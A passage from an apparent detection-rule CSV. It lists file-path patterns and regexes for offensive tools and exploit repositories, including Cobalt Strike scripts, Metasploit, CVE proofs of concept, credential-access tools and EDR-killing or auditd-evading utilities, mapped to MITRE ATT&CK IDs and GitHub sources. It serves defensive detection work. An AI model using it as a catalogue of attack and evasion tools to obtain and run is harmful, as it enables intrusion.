Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/custom_payload_generator/*",".{0,1000}\/custom_payload_generator\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Aggressor Scripts I've Created.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/offsecginger/AggressorScripts","1","1","N/A","10","10","145","30","2022-01-01T19:04:27Z","2018-11-30T03:14:45Z" "*/customPayload/*",".{0,1000}\/customPayload\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/CVE-*-*_POC.py*",".{0,1000}\/CVE\-.{0,1000}\-.{0,1000}_POC\.py.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*/CVE-*.bin",".{0,1000}\/CVE\-.{0,1000}\.bin","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/CVE-*.jar",".{0,1000}\/CVE\-.{0,1000}\.jar","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/CVE*/chocobo_root*",".{0,1000}\/CVE.{0,1000}\/chocobo_root.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/cve*/exploit.go*",".{0,1000}\/cve.{0,1000}\/exploit\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*/CVE-*_EXPLOIT_0DAY/*",".{0,1000}\/CVE\-.{0,1000}_EXPLOIT_0DAY\/.{0,1000}","offensive_tool_keyword","poc","Exploit for the CVE-2023-23399","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","2","157","45","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z" "*/CVE-*x64.exe",".{0,1000}\/CVE\-.{0,1000}x64\.exe","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/CVE-*x86.exe",".{0,1000}\/CVE\-.{0,1000}x86\.exe","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/CVE-2009-2698/katon.c*",".{0,1000}\/CVE\-2009\-2698\/katon\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/CVE-2022-*.git*",".{0,1000}\/CVE\-2022\-.{0,1000}\.git.{0,1000}","offensive_tool_keyword","POC","POC exploit pattern from github","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/CVE-2022-*.go*",".{0,1000}\/CVE\-2022\-.{0,1000}\.go.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*/CVE-2022-0847.c*",".{0,1000}\/CVE\-2022\-0847\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation 
tools","https://github.com/4luc4rdr5290/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-08T20:41:15Z","2022-03-08T20:18:28Z" "*/CVE-2022-0847/write_anything.c*",".{0,1000}\/CVE\-2022\-0847\/write_anything\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tools","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z" "*/CVE-2022-0847-dirty-pipe-checker*",".{0,1000}\/CVE\-2022\-0847\-dirty\-pipe\-checker.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker","1","1","N/A","N/A","1","62","27","2023-06-14T23:25:46Z","2022-03-08T17:13:24Z" "*/CVE-2022-0847-DirtyPipe-Exploit*",".{0,1000}\/CVE\-2022\-0847\-DirtyPipe\-Exploit.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit","1","1","N/A","N/A","10","1074","219","2022-03-08T06:20:05Z","2022-03-07T18:55:20Z" "*/CVE-2022-0847-dirty-pipe-exploit*",".{0,1000}\/CVE\-2022\-0847\-dirty\-pipe\-exploit.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit","1","1","N/A","N/A","1","2","3","2022-03-08T11:15:00Z","2022-03-08T10:40:07Z" "*/CVE-2022-0847-Docker*",".{0,1000}\/CVE\-2022\-0847\-Docker.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/mrchucu1/CVE-2022-0847-Docker","1","1","N/A","N/A","1","0","1","2022-03-08T17:05:01Z","2022-03-08T17:02:40Z" 
"*/cve-2022-23131-exp/blob/main/zabbix.py*",".{0,1000}\/cve\-2022\-23131\-exp\/blob\/main\/zabbix\.py.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/random-robbie/cve-2022-23131-exp","1","1","N/A","N/A","1","8","7","2022-02-23T16:37:13Z","2022-02-23T16:34:03Z" "*/CVE-2022-26809-RCE*",".{0,1000}\/CVE\-2022\-26809\-RCE.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/websecnl/CVE-2022-26809","1","1","N/A","N/A","1","30","3","2022-04-19T17:04:04Z","2022-04-14T08:12:24Z" "*/CVE-2023-*.git*",".{0,1000}\/CVE\-2023\-.{0,1000}\.git.{0,1000}","offensive_tool_keyword","POC","POC exploit pattern from github","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/CVE-2023-34362.git*",".{0,1000}\/CVE\-2023\-34362\.git.{0,1000}","offensive_tool_keyword","POC","CVE-2023-34362: MOVEit Transfer Unauthenticated RCE","T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003","TA0005 - TA0001 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sfewer-r7/CVE-2023-34362","1","1","N/A","N/A","1","62","23","2024-03-24T00:46:38Z","2023-06-12T12:56:12Z" "*/CVE-2023-38831-RaRCE*",".{0,1000}\/CVE\-2023\-38831\-RaRCE.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*/CVE-2024-1086.git*",".{0,1000}\/CVE\-2024\-1086\.git.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","1","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*/CVE-2024-21338.git*",".{0,1000}\/CVE\-2024\-21338\.git.{0,1000}","offensive_tool_keyword","POC","Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.","T1055.011 - T1548.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/hakaioffsec/CVE-2024-21338","1","1","N/A","9","3","207","48","2024-04-16T21:00:14Z","2024-04-13T05:53:02Z" "*/cvs-brute.nse*",".{0,1000}\/cvs\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cvs-brute-repository.nse*",".{0,1000}\/cvs\-brute\-repository\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/CWoNaJLBo/VTNeWw11212/*",".{0,1000}\/CWoNaJLBo\/VTNeWw11212\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/CWoNaJLBo/VTNeWw11213/*",".{0,1000}\/CWoNaJLBo\/VTNeWw11213\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. 
This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/Cybellum*",".{0,1000}\/Cybellum.{0,1000}","offensive_tool_keyword","Github Username","Zero day code injection and vulnerabilities github repo","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Cybellum","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/CyDefUnicorn*",".{0,1000}\/CyDefUnicorn.{0,1000}","offensive_tool_keyword","Github Username","pentest tools repo","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/CyDefUnicorn","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/D1rkInject.git*",".{0,1000}\/D1rkInject\.git.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory 
state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*/D3m0n1z3dShell.git*",".{0,1000}\/D3m0n1z3dShell\.git.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*/D3m0n1z3dShell/archive/*",".{0,1000}\/D3m0n1z3dShell\/archive\/.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*/d4em0n/exrop*",".{0,1000}\/d4em0n\/exrop.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","277","27","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*/daap-get-library.nse*",".{0,1000}\/daap\-get\-library\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dacledit.py*",".{0,1000}\/dacledit\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/daclread.py*",".{0,1000}\/daclread\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/DAMP.git*",".{0,1000}\/DAMP\.git.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","373","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" 
"*/DanMcInerney/ridenum*",".{0,1000}\/DanMcInerney\/ridenum.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/daphne.git*",".{0,1000}\/daphne\.git.{0,1000}","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","15","3","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" "*/daphne-x64*",".{0,1000}\/daphne\-x64.{0,1000}","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","15","3","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" "*/darkarmour.git*",".{0,1000}\/darkarmour\.git.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","690","117","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" "*/DarkCoderSc/*",".{0,1000}\/DarkCoderSc\/.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1060","181","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z" "*/darkexe.py*",".{0,1000}\/darkexe\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - 
TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*/darkhotel.py*",".{0,1000}\/darkhotel\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/DarkLoadLibrary.git*",".{0,1000}\/DarkLoadLibrary\.git.{0,1000}","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","10","990","199","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" "*/Darkside.exe*",".{0,1000}\/Darkside\.exe.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","1","N/A","10","2","117","24","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z" "*/Darkside.git*",".{0,1000}\/Darkside\.git.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","1","N/A","10","2","117","24","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z" "*/Darkside.sln*",".{0,1000}\/Darkside\.sln.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense 
Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","0","N/A","10","2","117","24","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z" "*/darkweb2017-top100.txt*",".{0,1000}\/darkweb2017\-top100\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/DarkWidow.git*",".{0,1000}\/DarkWidow\.git.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*/data/attacks/*.txt*",".{0,1000}\/data\/attacks\/.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*/data/auxiliary/gather*",".{0,1000}\/data\/auxiliary\/gather.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
